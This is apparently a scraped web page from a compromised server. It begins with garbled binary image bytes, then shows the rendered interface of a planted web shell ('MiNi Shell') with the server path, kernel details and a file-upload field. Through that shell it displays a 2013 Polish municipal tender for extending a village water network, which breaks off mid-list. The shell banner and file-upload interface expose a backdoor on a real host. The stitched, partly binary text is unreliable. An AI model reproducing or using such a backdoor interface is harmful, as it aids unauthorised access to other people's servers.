JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130411/142096-N-2013.html

<p class="kh_header"><b>Stara Dąbrowa: Rozbudowa sieci wodociągowej Chlebówko - Chlebowo - Rosowo, Gmina Stara Dąbrowa</b><br>
<b>Numer ogłoszenia: 142096 - 2013; data zamieszczenia: 11.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stara Dąbrowa , 20, 73-112 Stara Dąbrowa, woj. zachodniopomorskie, tel. 0-91 5739820, 5739832, faks 0-91 5739822.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.staradabrowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa sieci wodociągowej Chlebówko - Chlebowo - Rosowo, Gmina Stara Dąbrowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rozbudowa sieci wodociągowej Chlebówko-Chlebowo-Rosowo, zlokalizowanego obręb Chlebówko na działkach nr geod. 290, 35, obręb Chlebowo na działkach nr geod. 21/1, 19, 16/1, 16/2, 17/1, 20/17, obręb Rosowo na działkach nr geod. 4/1, 21. 
Zakres prac, cena jednostki obmiarowej obejmuje:
1. rozbiórka nawierzchni drogowych,
2.odtworzenie nawierzchni asfaltowej na podbudowie z kamienia brukowego lub innej;
Cena wykonania podłoża robót obejmuje:
a)prace pomiarowe i pomocnicze,
b)oznakowanie robót prowadzonych w pasie drogowym,
c)mechaniczne i ręczne profilowanie dna koryta gruntowego,
d)wykonanie pomiarów i badań kontrolnych zgodnie ze Specyfikacją Techniczną,
e) uporządkowanie miejsc prowadzonych robót.
Cena wykonanie podbudowy z kamienia brukowego na podsypce cementowo-piaskowej:
a)prace pomiarowe i pomocnicze,
b)oznakowanie robót prowadzonych w pasie drogowym,
c) mechaniczne zagęszczenie podłoża,
d) transport materiałów przewidzianych do wykonania robót,
e)wykonanie podbudowy,
f)wykonanie pomiarów i badań kontrolnych zgodnie z Dokumentacją Projektową Specyfikacją Techniczną.
g)uporządkowanie miejsc prowadzonych robót.
Cena wykonania nawierzchni asfaltowej wykonania robót obejmuje:
a) prace pomiarowe i pomocnicze,
b)oznakowanie robót prowadzonych w pasie drogowym,
c)ręczne odspojenie stwardniałych zanieczyszczeń,
d)przygotowanie mieszanki,
e) transport mieszanki na miejsce wbudowania,
f)posmarowanie gorącym bitumem krawężników i urządzeń obcych,
g)mechaniczne rozłożenie warstwy mieszanki,
h)mechaniczne zagęszczenie warstwy,
i)obcięcie krawędzi nawierzchni,
j)przeprowadzanie badań i pomiarów,
k)transport gruntu na odkład,
l)wykonanie pomiarów i badań kontrolnych zgodnie ze Specyfikacją Techniczną,
ł)uporządkowanie miejsc prowadzonych robót.
Zakres robót pomiarowych, związanych z wyznaczeniem tras i osi oraz punktów wysokościowych wchodzą:
1) wyznaczenie sytuacyjne i wysokościowe punktów głównych, osi trasy i punktów wysokościowych,
2) uzupełnienie osi trasy dodatkowymi punktami (wyznaczenie osi),
3) wyznaczenie dodatkowych punktów wysokościowych (reperów roboczych),
4)wyznaczenie przekrojów poprzecznych,
5)wyznaczenie obiektów kubaturowych, pompowni oraz ich osi a także zaniwelowania charakterystyczny rzędnych,
6)zastabilizowanie punktów w sposób trwały, ochrona ich przed zniszczeniem oraz oznakowanie w sposób ułatwiający odszukanie i ewentualne odtworzenie,
7) odtworzenie trasy i punktów wysokościowych.
Roboty obejmują:
1)wytyczenie i obsługę geodezyjną budowy dróg i chodników,
2)wytyczenie tras sieci,
3)obsługę budowy,
4)sporządzenie mapy powykonawczej i włączenie do zasobów geodezyjnych.
Cena wykonania robót obejmuje:
a) wyznaczenie punktów głównych osi trasy i punktów wysokościowych,
b)uzupełnienie osi trasy dodatkowymi punktami,
c) wykonanie pomiarów bieżących,
d)wyznaczenie przekrojów poprzecznych z ewentualnym wytyczeniem dodatkowych przekrojów,
e)wykonanie mapy powykonawczej.
Płatność za 1 m należy przyjmować na podstawie szkiców i dzienników pomiarów geodezyjnych lub protokołu kontroli geodezyjnej.
Zakres robót wykonania rurociągów ciśnieniowych, obejmujących dostawę oraz montaż następujących elementów:
1) rur i kształtek z PEHD,
2) armatury,
3) rur i kształtek stalowych,
4) kształtek żeliwnych,
5) wykonanie podłoża,
6) wykonanie skrzyżowań z istniejącym uzbrojeniem podziemnym i przeszkodami
terenowymi,
7)wykonanie prób szczelności
Cena jednostki obmiarowej obejmuje:
Wykonanie rurociągu:
a) prace przygotowawcze,
b) prace pomiarowe,
c) oznakowanie robót,
d) transport materiałów przewidzianych do wykonania robót,
e) wykonanie, rozbiórka i utrzymanie ewentualnych dróg tymczasowych,
f) montaż rurociągów,
g) montaż kształtek,
h) montaż armatury,
i) montaż rur ochronnych na istniejącym uzbrojeniu podziemnym i rurociągach,
j)oznaczenie trasy rurociągów,
k) wykonanie niezbędnych pomiarów i badań.
l) uporządkowanie miejsca robot i usunięcie pozostałych materiałów,
Przygotowanie podłoża
a)prace przygotowawcze,
b) prace pomiarowe,
c) oznakowanie robót,
d) transport materiałów przewidzianych do wykonania robót,
e) wykonanie, rozbiórka i utrzymanie ewentualnych dróg tymczasowych,
f) przygotowanie podłoża,
g) uporządkowanie miejsca robot i usunięcie pozostałych materiałów,
Wykonanie próby szczelności;
a) oznakowanie robót,
b) prace przygotowawcze,
c) wykonanie próby szczelności,
d) wykonanie niezbędnych pomiarów i badań.
Wykonawca jest zobowiązany do stałej i systematycznej kontroli robót. Kontrola powinna w szczególności powinna obejmować:
a) sprawdzenie rzędnych założonych ław celowniczych w nawiązaniu do podanych punktów wysokościowych z dokładnością do 1cm,
b)badanie i zabezpieczenie wykopów przed zalaniem wodą,
c) badania i pomiary szerokości, grubości i zagęszczenia podłoża,
d)badania odchylenia osi rurociągów,
e) sprawdzenie zgodności z dokumentacją projektową usytuowania rurociągów i uzbrojenia,
f) badanie odchylenia spadku rurociągów,
g) badanie wykonania rur ochronnych
h) badanie połączeń rurociągów,
i) badanie stopnia zagęszczenia poszczególnych warstw zasypu,
j) sprawdzenie rzędnych posadowienia ułożonych rurociągów,
k wykonanie próby szczelności odcinka rurociągu (odcinki nie dłuższe niż 300 m) i całego   rurociągu przy ciśnieniu próbnym 1,0 MPa.
Zakres robót związanych ze zdjęciem warstwy humusu oraz wykonaniem wykopów i nasypów w gruntach kategorii I-IV w związku z wymianą sieci wodociągowej i przyłączy wodociągowych obejmują:
1) ręczne zdjęcie warstwy humusu do głębokości 20 cm,
2) spryzmowanie zdjętego humusu,
3) ręczne rozplantowanie humusu lub jego wywiezienie,
4) ręczne wykonywanie wykopów wraz z ich umocnieniem i odwodnieniem,
5) obsybka piaskowa o grubości 30 cm ponad wierzch rury,
6) ręczne zasypanie wykopów wraz z ich zagęszczeniem,
7) zabezpieczenie skrzyżowań z istniejącym uzbrojeniem podziemnym,
8) mechaniczne lub ręczne rozplantowanie lub wywóz urobku z wykopów do 10 km,
9) formowanie i zagęszczanie warstwami,
Badania w czasie prowadzenia robót polegają na sprawdzeniu przez Inspektora Nadzoru na bieżąco, w miarę postępu robót, jakości używanych przez Wykonawcę materiałów i zgodności wykonywanych robót ziemnych  Dokumentacją Projektową i wymaganiami niniejszej specyfikacji. Kontrolę prowadzić według PN-B-10736.
Cena jednostki obmiarowej obejmuje:
a) zdjęcie warstwy humusu;
b) zdjęcie warstwy humusu grubości 20 cm,
c)spryzmowanie zdjętego humusu w bliskości robót,
d) rozplanowanie lub wywiezienie humusu.
2) Wykonanie wykopów, ich umocnienie, zasyp;
a)prace pomiarowe i pomocnicze,
b) oznakowanie robót prowadzonych w pasie drogowym,
c) mechaniczne i ręczne wykonywanie wykopów,
d) umocnienie wykopów i ich usunięcie,
e) profilowanie dna wykopu, rowów, skarp,
f) uzyskanie pozwolenia wodnoprawnego na zrzut wody z odwodnienia wykopów,
g)zasypanie wraz z zagęszczeniem powierzchni wykopu w strefie obsypki,
h) zasypanie wraz z zagęszczeniem wykopu w strefie zasypki
i) wykonanie i rozbiórka ewentualnych dróg dojazdowych,
j) mechaniczne i ręczne rozplantowanie urobku z wykopów,
k) zabezpieczenie skrzyżowań z istniejącym uzbrojeniem podziemnym,
l) wywiezienie nadmiaru ziemi na odległość na 10,0 km,
ł) transport gruntu w miejsce budowania nasypów,
m) wykonanie niezbędnych prób i badań,
n) koszt utylizacji odpadów (nadmiernej ilości ziemi w wykopów)
o) uporządkowanie miejsc prowadzonych robót.
Zakres prac będzie obejmował:
1.Projektowane odcinki sieci wodociągowej wykonać z rur DN125 mm PE(niebieski) na ciśnienie 1MPa.
2.Przewody wodociągowe ułożyć w wykopie w nienaruszonym gruncie rodzimym na głębokości ok. 1,4 m. trasa i spadek wodociągu wg rysunków - wzdłuż pasa drogowego.
3.Połączenia kołnierzowe oraz kształtki (trójniki, kolana) z żeliwa sferoidalnego GGG-40 epoksydowego, o wymiarach i kątach typowych.
4.Połączenie kształtki żeliwnej i rurociągu PE projektuje się za pomocą kołnierzy specjalnych do rur PE z żeliwa sferoidalnego, zabezpieczone przed przesunięciem. Połączenie z istniejącym wodociągami żeliwnymi za pomocą złączy RK. Śruby do połączeń kołnierzowych oraz podkładki - ze stali nierdzewnej klasy A-2/70. Nakrętki ze stali nierdzewnej klasy A-4/80. Połączenia kołnierzowe zabezpieczyć taśmą termokurczliwą. 
5.Armaturę odcinającą stanowią żeliwne zasuwy kołnierzowe długie. Obudowa, głowica oraz korpus zamykający wykonane z żeliwa sferoidalnego GGG-40, obudowa i głowica wewnątrz epoksydowane metodą fluidyzacyjną, korpus zamykający wewnętrznie i zewnętrznie pokryty wulkanizowaną powłoką elastomerową, wrzeciono ze stali nierdzewnej z walcowatym gwintem, w części uszczelniającej wrzeciono polerowane. Uszczelki typu O-ring z elastomeru. Śruby łączące ze stali nierdzewnej z zabezpieczeniem przed penetracją wody. Trzpień teleskopowy - oryginalny danego producenta zasuwy.
6.Na uzbrojenia zamontować skrzynki uliczne z deklem żeliwnym typu ciężkiego (40T), korpus z żeliwa (dopuszcza się alternatywę - HDPE, wytrzymałość na temp +200 st.C, podstawa pod skrzynkę z HDPE przenosząca obciążenia 40T.
7.Na wodociągu zamontować hydranty nadziemne HAWLE,AWP lub inne o zadanych parametrach DN 80 o wydajności 10 dm3/s (lokalizacja wg rysunków). Hydrant zainstalowany na wodociągu będzie odcięty zasuwą z oryginalną obudową producenta zasuwy znajdującą się w odległości o. 1 m od hydrantu i pozostanie w położeniu otwartym. Hydrant oznaczony tabliczką zgodnie z PN-M-51520;1965.
8. Na załamaniach trasy, pod zasuwami oraz pod hydrantem należy wykonać bloki oporowe.
9.Włączenie projektowanego odcinka z Chlebówka do Chlebowa wykonać do istniejącego wodociągu śr. 100 w drodze dojazdowej w Chlebówku oraz w drodze dojazdowej w Chlebowie za pomocą kształtek przejściowych. Na wodociągu na jego włączeniu i końcówce zamontować zasuwy. Trzpień zasuwy należy wyprowadzić w obudowie teleskopowej do skrzynki ulicznej. Skrzynka do zasuwy żeliwna z deklem ciężkim. Teren wokół trzpienia w promieniu 1 m należy utwardzić (wybetonować lub wybrukować - dostosować do istniejącej nawierzchni).
10.Włączenie projektowanego odcinka z Chlebowa do Rosowa wykonać do istniejącego wodociągu w drodze dojazdowej w Chlebowie oraz w drodze dojazdowej w Rosowie za pomocą kształtek przejściowych. Na wodociągu na jego włączeniu i końcowe zamontować zasuwy. 
11.Przejście pod rzeką Karpiel wykonać metodą przecisku w rurze osłonowej śr.200PE-HD L=15m. Góra rury znajdować się będzie 1,4m pod dnem rzeki. 
12. Należy odciąć od sieci ujęcie wody w Rosowie na dz.21 zasuwą DN100. Zasilanie sieci w Rosowie odbywać się będzie z Chlebówka. 
13.Należy odciąć od sieci ujęcie wody w Chlebowie na dz.17/1 zaślepiając rurociąg zasilający. 
14.Studnie wodociągowe nr 1 i 2 na terenie wiejskiego ujęcia w Chlebowie dz.21 należy zlikwidować.
15. Nad projektowanym wodociągiem na wysokości 40 cm ułożyć taśmę ostrzegawczo - lokalizacyjną koloru niebieskiego z wkładką metalową. 
16.Zamontować tablice orientacyjne dla oznaczenia uzbrojenia na przewodach wodociągowych.
17.Po zakończeniu prac przeprowadzić próbę szczelności przyłączy oraz płukanie i dezynfekcję przewodu i uzyskać pozytywny wynik badania wody potwierdzony przez Sanepid. 
Oferent ponosi wszelkie koszty związane z:
1.Obsługą geodezyjną (wytyczenie trasy sieci, szkice i mapy inwentaryzacji powykonawczej).
2. Sporządzeniem projektu organizacji ruchu dla robót w pasie drogi powiatowej i dróg gminnych.
3. Sporządzeniem dokumentacji powykonawczej wykonanych robót.
4. Sporządzeniem planu bezpieczeństwa i ochrony zdrowia.
5. Badaniem stopnia zagęszczenia gruntu w pasie dróg.
6. Urządzeniem i zagospodarowaniem placu budowy oraz jego zabezpieczeniem.
7. Ubezpieczeniem budowy do wysokości przedmiotowego zamówienia.
8. Odtworzeniem i przywróceniem do stanu pierwotnego terenów, na których prowadzone będą prace budowlane, związane z wykonaniem sieci i przyłączy.
9. Zabezpieczeniem wykopów i ich oznakowaniem.
10. Wykonaniem wymaganych obowiązującymi przepisami: badań, sprawdzeń, prób, kontroli i odbiorów technicznych (między innymi prób szczelności sieci, badanie zagęszczenia gruntu, odbiór zajętego pasa drogowego).
11. Zgłoszeniem do wszystkich jednostek branżowych, faktu rozpoczęcia robót oraz współpraca z tymi jednostkami w zakresie realizowanego zadania inwestycyjnego.
12. Uzyskaniem w imieniu Zamawiającego decyzji zajęcia pasa drogowego i pokrycia kosztów z tym związanych. Decyzje o umieszczeniu urządzeń obcych w pasie drogowym, będą stanowiły odrębne decyzje wystawione na wniosek Wykonawcy na Zamawiającego. Opłaty związane z umieszczeniem urządzeń obcych w pasie drogowym pokryje bezpośrednio Zamawiający na podstawie dostarczonej decyzji.
13. Pokryciem szkód powstałych na skutek realizacji inwestycji, a wynikających z przyczyn leżących po stronie Wykonawcy.
14. Ewentualnymi innymi kosztami, które zdaniem oferenta trzeba ponieść w związku z realizacją zamówienia.
15. Odbiory kolizji i skrzyżowań sieci wodociągowej z siecią gazową i inne płatne odbiory i nadzory, zgodnie z zaleceniem określonymi w warunkach technicznych do projektu.
16.Ewentualne odszkodowania z tytułu zniszczonych nasadzeń, np. krzewów, drzew, zasiewów, kwietników.
17.Koszty z tytułu dokonanych zniszczeń nie wynikających z zakresu robót.
18.Koszty wynikające z dokumentacji projektowej dotyczące:
a)zabezpieczenia i oznakowania robót przy budowie wodociągu, w tym przy przekraczaniu dróg powiatowych i gminnych,
b)rozwiązań (warunki techniczne) uwzględnionych w projekcie budowlano-wykonawczym, a nie ujętych w przedmiarze robót.
Jeżeli w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych lub przedmiarze robót - stanowiących załączniki do Specyfikacji istotnych warunków zamówienia, zostały wprowadzone nazwy własne materiałów lub produktów, Zamawiający dopuszcza zastosowanie materiałów i produktów równoważnych do wskazanych pod warunkiem posiadania przez te materiały i produkty nie gorszych parametrów technicznych, charakteryzujących wskazany produkt, stanowiących o ich przydatności, charakterze, wytrzymałości itp.
Jeżeli w Specyfikacji istotnych warunków zamówienia, przedmiarze robót, specyfikacjach technicznych wykonania i odbioru robót wymienione zostały materiały budowlane, bez uszczegółowienia ich parametrów typu, materiał, z jakiego mają być wykonane, charakterystyczne parametry wytrzymałościowe, wykonawca jest zobowiązany zadać pytanie na etapie składania ofert o uszczegółowienie tych parametrów. Nie zadanie pytania przez Wykonawcę, nie może skutkować założeniem przez Wykonawcę danego rodzaju materiału, czy parametrów wytrzymałościowych, i brakiem możliwości wyboru materiału w trakcie realizacji robót przez Zamawiającego. Zamawiający zastrzega sobie prawo do możliwości wyboru elementów wyposażenia i wykończenia wnętrz z wyłonionym Wykonawcą. Wykonawca zobowiązany jest do założenia materiałów najwyższego gatunku i najwyższej klasy.
Wszystkie materiały nie nadające się do ponownego wbudowania, a pochodzące z prowadzonych w ramach inwestycji robót wymagające wywozu np. rozbiórkowych, ziemnych będą stanowiły własność Wykonawcy. Wykonawca jest wytwórcą odpadów w rozumieniu przepisów ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz.U. z 2010r. Nr 185, poz. 1243 z późniejszymi zmianami). Wykonawca w trakcie realizacji zamówienia ma obowiązek w pierwszej kolejności poddania odpadów budowlanych (odpadów betonowych, ziemi, gruzu budowlanego) odzyskowi, a jeżeli z przyczyn technologicznych jest on niemożliwy lub nieuzasadniony z przyczyn ekologicznych lub ekonomicznych, to Wykonawca zobowiązany jest do przekazania odpadów do unieszkodliwienia. Wykonawca zobowiązany jest udokumentować Zamawiającemu sposób gospodarowania tymi odpadami, jako warunek dokonania odbioru końcowego realizowanego zamówienia. W przypadku materiałów nie nadających się do ponownego użycia, np. gruz, należy uwzględnić wywóz do firm zajmujących się ich przeróbką i utylizacją. Wykonawca zapewni przejezdność wszystkich dróg przechodzących w sąsiedztwie przekazanego frontu robót, a jeśli nie będzie to możliwe zabezpieczy dojazd do poszczególnych posesji przez cały okres prowadzenia prac. Wykonawca zapewni pełną obsługę geodezyjną budowy wraz z wytyczeniem linii regulacyjnych ulicy na dzień przekazania placu budowy.
Lokalizacja zadania inwestycyjnego:
Rozbudowa sieci wodociągowej Chlebówko - Chlebowo - Rosowo, zlokalizowanego obręb Chlebówko na działkach nr geod. 290, 35, obręb Chlebowo na działkach nr geod. 21/1, 19, 16/1, 16/2, 17/1, 20/17, obręb Rosowo na działkach nr geod. 4/1, 21.
Trasa przedmiotowej inwestycji przebiega przez stanowiska archeologiczne. Zgodnie z art.31 ustawy za dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami osoba fizyczna lub jednostka organizacyjna, która zamierza realizować roboty budowlane na terenie zabytków archeologicznych zobowiązana jest z zastrzeżeniem art. 82a ust. 1, pokryć koszty niezbędnych badań archeologicznych. Inwestor zawrze stosowną umowę oraz zostanie obciążony kosztami związanymi  z prowadzeniem badań archeologicznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium. 
2.Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 10 000,00 zł 
(słownie: dziesięć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca złoży stosowne oświadczenie  oraz przedłoży wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących trzech robót odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o wartości zamówienia (każdej roboty oddzielnie) nie mniejszej niż 1 000 000,00 zł brutto każda, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca złoży stosowne oświadczenie oraz przedłoży wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi o specjalności instalacyjno-inżynieryjnej w zakresie sieci i instalacji sanitarnych (minimum wodociągowe) bez ograniczeń wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o postawie do dysponowania tymi osobami, a także oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca złoży stosowne oświadczenie, a także przedstawi informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert potwierdzającą posiadanie środków finansowych lub zdolności kredytowej wykonawcy w wysokości 100% zaproponowanego wynagrodzenia brutto oraz przedstawi opłaconą polisę, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wysokość minimum 1 000 000,00zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

